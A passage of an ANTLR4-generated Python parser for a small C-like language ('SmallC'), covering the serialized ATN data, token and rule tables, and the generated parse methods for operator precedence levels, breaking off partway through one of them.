buf.write("\2\2\u01c0\u01be\3\2\2\2\u01c0\u01c1\3\2\2\2\u01c1E\3")
buf.write("\2\2\2\u01c2\u01c0\3\2\2\2\u01c3\u01c6\5^\60\2\u01c4\u01c6")
buf.write("\5H%\2\u01c5\u01c3\3\2\2\2\u01c5\u01c4\3\2\2\2\u01c6G")
buf.write("\3\2\2\2\u01c7\u01c8\7&\2\2\u01c8I\3\2\2\2\u01c9\u01ca")
buf.write("\7\31\2\2\u01ca\u01cb\5L\'\2\u01cb\u01ce\7\32\2\2\u01cc")
buf.write("\u01cd\7\3\2\2\u01cd\u01cf\5P)\2\u01ce\u01cc\3\2\2\2\u01ce")
buf.write("\u01cf\3\2\2\2\u01cf\u01d6\3\2\2\2\u01d0\u01d3\5L\'\2")
buf.write("\u01d1\u01d2\7\3\2\2\u01d2\u01d4\5P)\2\u01d3\u01d1\3\2")
buf.write("\2\2\u01d3\u01d4\3\2\2\2\u01d4\u01d6\3\2\2\2\u01d5\u01c9")
buf.write("\3\2\2\2\u01d5\u01d0\3\2\2\2\u01d6K\3\2\2\2\u01d7\u01d8")
buf.write("\7\31\2\2\u01d8\u01d9\5L\'\2\u01d9\u01da\7\32\2\2\u01da")
buf.write("\u01e0\3\2\2\2\u01db\u01dd\5N(\2\u01dc\u01de\5\62\32\2")
buf.write("\u01dd\u01dc\3\2\2\2\u01dd\u01de\3\2\2\2\u01de\u01e0\3")
buf.write("\2\2\2\u01df\u01d7\3\2\2\2\u01df\u01db\3\2\2\2\u01e0M")
buf.write("\3\2\2\2\u01e1\u01e2\7\31\2\2\u01e2\u01e3\5N(\2\u01e3")
buf.write("\u01e4\7\32\2\2\u01e4\u01f4\3\2\2\2\u01e5\u01e7\5\60\31")
buf.write("\2\u01e6\u01e5\3\2\2\2\u01e7\u01ea\3\2\2\2\u01e8\u01e6")
buf.write("\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01eb\3\2\2\2\u01ea")
buf.write("\u01e8\3\2\2\2\u01eb\u01f4\5Z.\2\u01ec\u01ee\5\60\31\2")
buf.write("\u01ed\u01ec\3\2\2\2\u01ee\u01ef\3\2\2\2\u01ef\u01ed\3")
buf.write("\2\2\2\u01ef\u01f0\3\2\2\2\u01f0\u01f1\3\2\2\2\u01f1\u01f2")
buf.write("\5L\'\2\u01f2\u01f4\3\2\2\2\u01f3\u01e1\3\2\2\2\u01f3")
buf.write("\u01e8\3\2\2\2\u01f3\u01ed\3\2\2\2\u01f4O\3\2\2\2\u01f5")
buf.write("\u01fe\7\35\2\2\u01f6\u01fb\58\35\2\u01f7\u01f8\7\30\2")
buf.write("\2\u01f8\u01fa\58\35\2\u01f9\u01f7\3\2\2\2\u01fa\u01fd")
buf.write("\3\2\2\2\u01fb\u01f9\3\2\2\2\u01fb\u01fc\3\2\2\2\u01fc")
buf.write("\u01ff\3\2\2\2\u01fd\u01fb\3\2\2\2\u01fe\u01f6\3\2\2\2")
buf.write("\u01fe\u01ff\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0203\7")
buf.write("\36\2\2\u0201\u0203\58\35\2\u0202\u01f5\3\2\2\2\u0202")
buf.write("\u0201\3\2\2\2\u0203Q\3\2\2\2\u0204\u0206\7\60\2\2\u0205")
buf.write("\u0207\58\35\2\u0206\u0205\3\2\2\2\u0206\u0207\3\2\2\2")
buf.write("\u0207S\3\2\2\2\u0208\u020d\58\35\2\u0209\u020a\7\30\2")
buf.write("\2\u020a\u020c\58\35\2\u020b\u0209\3\2\2\2\u020c\u020f")
buf.write("\3\2\2\2\u020d\u020b\3\2\2\2\u020d\u020e\3\2\2\2\u020e")
buf.write("\u0212\3\2\2\2\u020f\u020d\3\2\2\2\u0210\u0212\3\2\2\2")
buf.write("\u0211\u0208\3\2\2\2\u0211\u0210\3\2\2\2\u0212U\3\2\2")
buf.write("\2\u0213\u0214\5Z.\2\u0214\u0215\7\31\2\2\u0215\u0216")
buf.write("\5T+\2\u0216\u0217\7\32\2\2\u0217W\3\2\2\2\u0218\u0219")
buf.write("\5Z.\2\u0219Y\3\2\2\2\u021a\u021b\7\65\2\2\u021b[\3\2")
buf.write("\2\2\u021c\u021d\7\16\2\2\u021d]\3\2\2\2\u021e\u021f\t")
buf.write("\2\2\2\u021f_\3\2\2\2\u0220\u0221\7\64\2\2\u0221a\3\2")
buf.write("\2\2\u0222\u0223\7\63\2\2\u0223c\3\2\2\2\u0224\u0225\7")
buf.write("\66\2\2\u0225e\3\2\2\2\u0226\u0227\7\67\2\2\u0227g\3\2")
buf.write("\2\2\67ox\u0082\u008d\u009f\u00a1\u00b3\u00b5\u00c3\u00c5")
buf.write("\u00d4\u00d6\u00ee\u00fa\u0105\u0107\u0110\u0112\u011c")
buf.write("\u0127\u012c\u0138\u013d\u014c\u0150\u0155\u015a\u015e")
buf.write("\u0161\u0165\u0169\u0171\u0185\u018e\u0196\u01ad\u01b9")
buf.write("\u01c0\u01c5\u01ce\u01d3\u01d5\u01dd\u01df\u01e8\u01ef")
buf.write("\u01f3\u01fb\u01fe\u0202\u0206\u020d\u0211")
return buf.getvalue()
class SmallCParser ( Parser ):
grammarFileName = "SmallC.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "'='", "'?'", "':'", "'||'", "'&&'", "'=='",
"'!='", "'<='", "'>='", "'+'", "'-'", "'*'", "'/'",
"'%'", "'++'", "'--'", "'&'", "'!'", "';'", "'#include'",
"'.'", "','", "'('", "')'", "'<'", "'>'", "'{'", "'}'",
"'['", "']'", "'\"'", "'char'", "'float'", "'int'",
"'void'", "'const'", "'volatile'", "'mutable'", "'if'",
"'else'", "'do'", "'while'", "'for'", "'break'", "'continue'",
"'return'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "COMMA", "LBRA", "RBRA",
"LABRA", "RABRA", "LCBRA", "RCBRA", "LSBRA", "RSBRA",
"QUOTE", "TYPECHAR", "TYPEFLOAT", "TYPEINT", "TYPEVOID",
"CONST", "VOLATILE", "MUTABLE", "IF", "ELSE", "DO",
"WHILE", "FOR", "BREAK", "CONTINUE", "RETURN", "COMMENT",
"MULTICOMMENT", "INTEGER", "FLOAT", "IDENTIFIER",
"CHARACTER", "STRING", "WS" ]
RULE_oplevel15 = 0
RULE_oplevel14 = 1
RULE_oplevel13 = 2
RULE_oplevel12 = 3
RULE_oplevel11 = 4
RULE_oplevel10 = 5
RULE_oplevel9 = 6
RULE_oplevel8 = 7
RULE_oplevel7 = 8
RULE_oplevel6 = 9
RULE_oplevel5 = 10
RULE_oplevel4 = 11
RULE_oplevel3 = 12
RULE_oplevel2 = 13
RULE_oplevel1 = 14
RULE_program = 15
RULE_include = 16
RULE_stdInclude = 17
RULE_customInclude = 18
RULE_functionDeclaration = 19
RULE_functionDefinition = 20
RULE_parameters = 21
RULE_parameter = 22
RULE_pointerPart = 23
RULE_arrayPart = 24
RULE_statements = 25
RULE_statement = 26
RULE_expression = 27
RULE_ifCond = 28
RULE_elseCond = 29
RULE_whileCond = 30
RULE_doWhileCond = 31
RULE_forLoop = 32
RULE_variableDeclaration = 33
RULE_declarationSpecifier = 34
RULE_cvQualifier = 35
RULE_declaratorInitializer = 36
RULE_declarator1 = 37
RULE_declarator2 = 38
RULE_initializer = 39
RULE_returnStmt = 40
RULE_arguments = 41
RULE_functionCall = 42
RULE_variable = 43
RULE_identifier = 44
RULE_pointer = 45
RULE_typeDeclaration = 46
RULE_floatLiteral = 47
RULE_integerLiteral = 48
RULE_characterLiteral = 49
RULE_stringLiteral = 50
ruleNames = [ "oplevel15", "oplevel14", "oplevel13", "oplevel12", "oplevel11",
"oplevel10", "oplevel9", "oplevel8", "oplevel7", "oplevel6",
"oplevel5", "oplevel4", "oplevel3", "oplevel2", "oplevel1",
"program", "include", "stdInclude", "customInclude",
"functionDeclaration", "functionDefinition", "parameters",
"parameter", "pointerPart", "arrayPart", "statements",
"statement", "expression", "ifCond", "elseCond", "whileCond",
"doWhileCond", "forLoop", "variableDeclaration", "declarationSpecifier",
"cvQualifier", "declaratorInitializer", "declarator1",
"declarator2", "initializer", "returnStmt", "arguments",
"functionCall", "variable", "identifier", "pointer",
"typeDeclaration", "floatLiteral", "integerLiteral",
"characterLiteral", "stringLiteral" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
COMMA=22
LBRA=23
RBRA=24
LABRA=25
RABRA=26
LCBRA=27
RCBRA=28
LSBRA=29
RSBRA=30
QUOTE=31
TYPECHAR=32
TYPEFLOAT=33
TYPEINT=34
TYPEVOID=35
CONST=36
VOLATILE=37
MUTABLE=38
IF=39
ELSE=40
DO=41
WHILE=42
FOR=43
BREAK=44
CONTINUE=45
RETURN=46
COMMENT=47
MULTICOMMENT=48
INTEGER=49
FLOAT=50
IDENTIFIER=51
CHARACTER=52
STRING=53
WS=54
def __init__(self, input:TokenStream):
super().__init__(input)
self.checkVersion("4.5.3")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class Oplevel15Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel15
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel15" ):
listener.enterOplevel15(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel15" ):
listener.exitOplevel15(self)
def oplevel15(self):
localctx = SmallCParser.Oplevel15Context(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_oplevel15)
try:
self.enterOuterAlt(localctx, 1)
self.state = 102
self.oplevel14()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel14Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel13(self):
return self.getTypedRuleContext(SmallCParser.Oplevel13Context,0)
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel14
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel14" ):
listener.enterOplevel14(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel14" ):
listener.exitOplevel14(self)
def oplevel14(self):
localctx = SmallCParser.Oplevel14Context(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_oplevel14)
try:
self.state = 109
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,0,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 104
self.oplevel13()
self.state = 105
self.match(SmallCParser.T__0)
self.state = 106
self.oplevel14()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 108
self.oplevel13()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel13Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel12(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.Oplevel12Context)
else:
return self.getTypedRuleContext(SmallCParser.Oplevel12Context,i)
def oplevel13(self):
return self.getTypedRuleContext(SmallCParser.Oplevel13Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel13
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel13" ):
listener.enterOplevel13(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel13" ):
listener.exitOplevel13(self)
def oplevel13(self):
localctx = SmallCParser.Oplevel13Context(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_oplevel13)
try:
self.state = 118
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,1,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 111
self.oplevel12(0)
self.state = 112
self.match(SmallCParser.T__1)
self.state = 113
self.oplevel12(0)
self.state = 114
self.match(SmallCParser.T__2)
self.state = 115
self.oplevel13()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 117
self.oplevel12(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel12Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel11(self):
return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)
def oplevel12(self):
return self.getTypedRuleContext(SmallCParser.Oplevel12Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel12
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel12" ):
listener.enterOplevel12(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel12" ):
listener.exitOplevel12(self)
def oplevel12(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel12Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 6
self.enterRecursionRule(localctx, 6, self.RULE_oplevel12, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 121
self.oplevel11(0)
self._ctx.stop = self._input.LT(-1)
self.state = 128
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = SmallCParser.Oplevel12Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel12)
self.state = 123
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 124
self.match(SmallCParser.T__3)
self.state = 125
self.oplevel11(0)
self.state = 130
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel11Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def oplevel11(self):
return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel11
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel11" ):
listener.enterOplevel11(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel11" ):
listener.exitOplevel11(self)
def oplevel11(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel11Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 8
self.enterRecursionRule(localctx, 8, self.RULE_oplevel11, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 132
self.oplevel7(0)
self._ctx.stop = self._input.LT(-1)
self.state = 139
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,3,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = SmallCParser.Oplevel11Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel11)
self.state = 134
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 135
self.match(SmallCParser.T__4)
self.state = 136
self.oplevel7(0)
self.state = 141
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,3,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel10Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel9(self):
return self.getTypedRuleContext(SmallCParser.Oplevel9Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel10
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel10" ):
listener.enterOplevel10(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel10" ):
listener.exitOplevel10(self)
def oplevel10(self):
localctx = SmallCParser.Oplevel10Context(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_oplevel10)
try:
self.enterOuterAlt(localctx, 1)
self.state = 142
self.oplevel9()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel9Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel8(self):
return self.getTypedRuleContext(SmallCParser.Oplevel8Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel9
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel9" ):
listener.enterOplevel9(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel9" ):
listener.exitOplevel9(self)
def oplevel9(self):
localctx = SmallCParser.Oplevel9Context(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_oplevel9)
try:
self.enterOuterAlt(localctx, 1)
self.state = 144
self.oplevel8()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel8Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel8
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel8" ):
listener.enterOplevel8(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel8" ):
listener.exitOplevel8(self)
def oplevel8(self):
localctx = SmallCParser.Oplevel8Context(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_oplevel8)
try:
self.enterOuterAlt(localctx, 1)
self.state = 146
self.oplevel7(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel7Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel6(self):
return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)
def oplevel7(self):
return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel7
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel7" ):
listener.enterOplevel7(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel7" ):
listener.exitOplevel7(self)
def oplevel7(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel7Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 16
self.enterRecursionRule(localctx, 16, self.RULE_oplevel7, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 149
self.oplevel6(0)
self._ctx.stop = self._input.LT(-1)
self.state = 159
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 157
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
self.state = 151
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 152
self.match(SmallCParser.T__5)
self.state = 153
self.oplevel6(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
self.state = 154
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 155
self.match(SmallCParser.T__6)
self.state = 156
self.oplevel6(0)
pass
self.state = 161
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel6Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def oplevel6(self):
return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel6
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel6" ):
listener.enterOplevel6(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel6" ):
listener.exitOplevel6(self)
def oplevel6(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel6Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 18
self.enterRecursionRule(localctx, 18, self.RULE_oplevel6, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 163
self.oplevel4(0)
self._ctx.stop = self._input.LT(-1)
self.state = 179
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,7,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 177
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,6,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 165
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 166
self.match(SmallCParser.LABRA)
self.state = 167
self.oplevel4(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 168
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 169
self.match(SmallCParser.T__7)
self.state = 170
self.oplevel4(0)
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 171
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 172
self.match(SmallCParser.RABRA)
self.state = 173
self.oplevel4(0)
pass
elif la_ == 4:
localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
self.state = 174
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 175
self.match(SmallCParser.T__8)
self.state = 176
self.oplevel4(0)
pass
self.state = 181
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,7,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel5Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel5
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel5" ):
listener.enterOplevel5(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel5" ):
listener.exitOplevel5(self)
def oplevel5(self):
localctx = SmallCParser.Oplevel5Context(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_oplevel5)
try:
self.enterOuterAlt(localctx, 1)
self.state = 182
self.oplevel4(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel4Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel3(self):
return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)
def oplevel4(self):
return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel4
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel4" ):
listener.enterOplevel4(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel4" ):
listener.exitOplevel4(self)
def oplevel4(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel4Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 22
self.enterRecursionRule(localctx, 22, self.RULE_oplevel4, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 185
self.oplevel3(0)
self._ctx.stop = self._input.LT(-1)
self.state = 195
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 193
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,8,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
self.state = 187
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 188
self.match(SmallCParser.T__9)
self.state = 189
self.oplevel3(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
self.state = 190
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 191
self.match(SmallCParser.T__10)
self.state = 192
self.oplevel3(0)
pass
self.state = 197
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel3Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel2(self):
return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)
def oplevel3(self):
return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel3
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel3" ):
listener.enterOplevel3(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel3" ):
listener.exitOplevel3(self)
def oplevel3(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel3Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 24
self.enterRecursionRule(localctx, 24, self.RULE_oplevel3, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 199
self.oplevel2()
self._ctx.stop = self._input.LT(-1)
self.state = 212
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 210
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
